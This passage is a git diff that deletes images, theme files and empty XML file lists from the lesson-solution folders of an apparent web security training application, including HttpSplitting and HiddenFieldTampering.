Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image006.jpg b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image006.jpg
deleted file mode 100644
index 7ec274b62..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image007.png b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image007.png
deleted file mode 100644
index a001e7963..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image008.jpg b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image008.jpg
deleted file mode 100644
index 672f7af05..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/themedata.thmx b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/ForgotPassword_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/ForgotPassword_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/filelist.xml b/src/main/webapp/lesson_solutions/ForgotPassword_files/filelist.xml
deleted file mode 100644
index ec8ce5b70..000000000
--- a/src/main/webapp/lesson_solutions/ForgotPassword_files/filelist.xml
+++ /dev/null
@@ -1,20 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image001.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image001.png
deleted file mode 100644
index 3e10c76d3..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image003.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image003.png
deleted file mode 100644
index 11a7001dc..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image005.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image005.png
deleted file mode 100644
index 033f2e8c8..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image007.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image007.png
deleted file mode 100644
index 664c24a06..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image009.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image009.png
deleted file mode 100644
index e0e2ffb7c..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image011.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image011.png
deleted file mode 100644
index 4542c5240..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image013.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image013.png
deleted file mode 100644
index f72055656..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image013.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image015.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image015.jpg
deleted file mode 100644
index 1f670723b..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image016.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image016.jpg
deleted file mode 100644
index 6f8105ce7..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image016.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image017.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image017.jpg
deleted file mode 100644
index 76540dad8..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image018.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image018.jpg
deleted file mode 100644
index 76c23e5ea..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image018.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image019.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image019.jpg
deleted file mode 100644
index fc38db81d..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image019.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image020.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image020.jpg
deleted file mode 100644
index c5a2f719f..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image020.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image021.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image021.jpg
deleted file mode 100644
index 5798c0713..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image021.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/themedata.thmx b/src/main/webapp/lesson_solutions/ForgotPassword_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/Thumbs.db b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/Thumbs.db
deleted file mode 100644
index ccd50130d..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/Thumbs.db and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/filelist.xml b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/filelist.xml
deleted file mode 100644
index a94e9430b..000000000
--- a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/filelist.xml
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image001.png b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image001.png
deleted file mode 100644
index 3757d471d..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image003.png b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image003.png
deleted file mode 100644
index e3ba2d5cd..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image005.png b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image005.png
deleted file mode 100644
index 1f0d5ebef..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image007.png b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image007.png
deleted file mode 100644
index a715a8db2..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image009.png b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image009.png
deleted file mode 100644
index 2914f15ec..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image011.jpg b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image011.jpg
deleted file mode 100644
index 06d8b5434..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image012.jpg b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image012.jpg
deleted file mode 100644
index 3be37d0cf..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image012.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image013.jpg b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image013.jpg
deleted file mode 100644
index 7feef4395..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image014.jpg b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image014.jpg
deleted file mode 100644
index 6bbe14316..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image014.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image015.jpg b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image015.jpg
deleted file mode 100644
index 02de6c5eb..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/themedata.thmx b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/HtmlClues_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/HtmlClues_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/filelist.xml b/src/main/webapp/lesson_solutions/HtmlClues_files/filelist.xml
deleted file mode 100644
index b8f56a1ec..000000000
--- a/src/main/webapp/lesson_solutions/HtmlClues_files/filelist.xml
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image001.png b/src/main/webapp/lesson_solutions/HtmlClues_files/image001.png
deleted file mode 100644
index 16a985f95..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image003.png b/src/main/webapp/lesson_solutions/HtmlClues_files/image003.png
deleted file mode 100644
index 6c3b652b2..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image005.png b/src/main/webapp/lesson_solutions/HtmlClues_files/image005.png
deleted file mode 100644
index baccb3c43..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image007.png b/src/main/webapp/lesson_solutions/HtmlClues_files/image007.png
deleted file mode 100644
index 7fe1df7d1..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image009.png b/src/main/webapp/lesson_solutions/HtmlClues_files/image009.png
deleted file mode 100644
index 4e0f0026e..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image011.jpg b/src/main/webapp/lesson_solutions/HtmlClues_files/image011.jpg
deleted file mode 100644
index 5c887a646..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image012.jpg b/src/main/webapp/lesson_solutions/HtmlClues_files/image012.jpg
deleted file mode 100644
index 80456d498..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image012.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image013.jpg b/src/main/webapp/lesson_solutions/HtmlClues_files/image013.jpg
deleted file mode 100644
index 38b875113..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image014.jpg b/src/main/webapp/lesson_solutions/HtmlClues_files/image014.jpg
deleted file mode 100644
index 3a8f380ac..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image014.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image015.jpg b/src/main/webapp/lesson_solutions/HtmlClues_files/image015.jpg
deleted file mode 100644
index a9d131b57..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/themedata.thmx b/src/main/webapp/lesson_solutions/HtmlClues_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/HttpBasics_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/HttpBasics_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/filelist.xml b/src/main/webapp/lesson_solutions/HttpBasics_files/filelist.xml
deleted file mode 100644
index 2d81880c2..000000000
--- a/src/main/webapp/lesson_solutions/HttpBasics_files/filelist.xml
+++ /dev/null
@@ -1,10 +0,0 @@
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/image001.png b/src/main/webapp/lesson_solutions/HttpBasics_files/image001.png
deleted file mode 100644
index 783a404ed..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/image003.png b/src/main/webapp/lesson_solutions/HttpBasics_files/image003.png
deleted file mode 100644
index 7d0a0830c..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/image005.jpg b/src/main/webapp/lesson_solutions/HttpBasics_files/image005.jpg
deleted file mode 100644
index 7b9b508a5..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/image005.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/image006.jpg b/src/main/webapp/lesson_solutions/HttpBasics_files/image006.jpg
deleted file mode 100644
index cb6599a1f..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/themedata.thmx b/src/main/webapp/lesson_solutions/HttpBasics_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab1.jpg b/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab1.jpg
deleted file mode 100644
index 5abdf6f73..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab1.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab2.jpg b/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab2.jpg
deleted file mode 100644
index 982f3f7bc..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab2.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/HttpOnly_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/HttpOnly_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/filelist.xml b/src/main/webapp/lesson_solutions/HttpOnly_files/filelist.xml
deleted file mode 100644
index b6972bfed..000000000
--- a/src/main/webapp/lesson_solutions/HttpOnly_files/filelist.xml
+++ /dev/null
@@ -1,20 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image001.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image001.png
deleted file mode 100644
index 169190729..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image003.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image003.png
deleted file mode 100644
index 597cc80eb..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image005.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image005.png
deleted file mode 100644
index 24e98dab8..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image007.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image007.png
deleted file mode 100644
index 6b5f8cb64..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image009.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image009.png
deleted file mode 100644
index 443fc7029..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image011.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image011.png
deleted file mode 100644
index a378ec244..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image013.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image013.png
deleted file mode 100644
index 98535fdfe..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image013.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image015.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image015.jpg
deleted file mode 100644
index efbe77300..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image016.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image016.jpg
deleted file mode 100644
index 195c2529b..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image016.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image017.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image017.jpg
deleted file mode 100644
index 91d8d9c6d..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image018.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image018.jpg
deleted file mode 100644
index adc7a901e..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image018.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image019.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image019.jpg
deleted file mode 100644
index acfd921d1..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image019.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image020.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image020.jpg
deleted file mode 100644
index 4c564391a..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image020.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image021.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image021.jpg
deleted file mode 100644
index 56107235b..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image021.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/themedata.thmx b/src/main/webapp/lesson_solutions/HttpOnly_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/HttpSplitting_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/HttpSplitting_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/filelist.xml b/src/main/webapp/lesson_solutions/HttpSplitting_files/filelist.xml
deleted file mode 100644
index 8b4e1e66e..000000000
--- a/src/main/webapp/lesson_solutions/HttpSplitting_files/filelist.xml
+++ /dev/null
@@ -1,34 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image001.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image001.png
deleted file mode 100644
index a3cecc9aa..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image003.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image003.png
deleted file mode 100644
index d62c55ea3..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image005.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image005.png
deleted file mode 100644
index 4168195ac..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image007.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image007.png
deleted file mode 100644
index d9f29ebed..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image009.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image009.png
deleted file mode 100644
index c75a97ac6..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image011.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image011.png
deleted file mode 100644
index addd9bce4..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image013.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image013.png
deleted file mode 100644
index 4f70cbce7..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image013.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image015.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image015.png
deleted file mode 100644
index 08c036f4e..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image015.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image017.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image017.png
deleted file mode 100644
index 9dccc349f..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image017.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image019.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image019.png
deleted file mode 100644
index 17708a3d7..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image019.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image021.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image021.png
deleted file mode 100644
index 59bec4ece..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image021.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image023.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image023.png
deleted file mode 100644
index 8887f463b..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image023.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image025.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image025.png
deleted file mode 100644
index 83279f010..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image025.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image027.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image027.png
deleted file mode 100644
index ac9b0590f..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image027.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image029.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image029.jpg
deleted file mode 100644
index 1f2923a0d..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image029.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image030.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image030.jpg
deleted file mode 100644
index 5c309829a..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image030.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image031.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image031.jpg
deleted file mode 100644
index 296995e6d..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image031.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image032.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image032.jpg
deleted file mode 100644
index 04b19c12d..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image032.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image033.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image033.jpg
deleted file mode 100644
index 1e20add5b..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image033.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image034.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image034.jpg
deleted file mode 100644
index cc30af047..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image034.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image035.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image035.jpg
deleted file mode 100644
index 0e01db1ea..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image035.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image036.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image036.jpg
deleted file mode 100644
index 51964a9bb..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image036.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image037.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image037.jpg
deleted file mode 100644
index 9f8efcbb7..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image037.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image038.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image038.jpg
deleted file mode 100644
index 036e50e47..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image038.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image039.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image039.jpg
deleted file mode 100644
index 81b54f365..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image039.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image040.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image040.jpg
deleted file mode 100644
index caf41923a..000000000
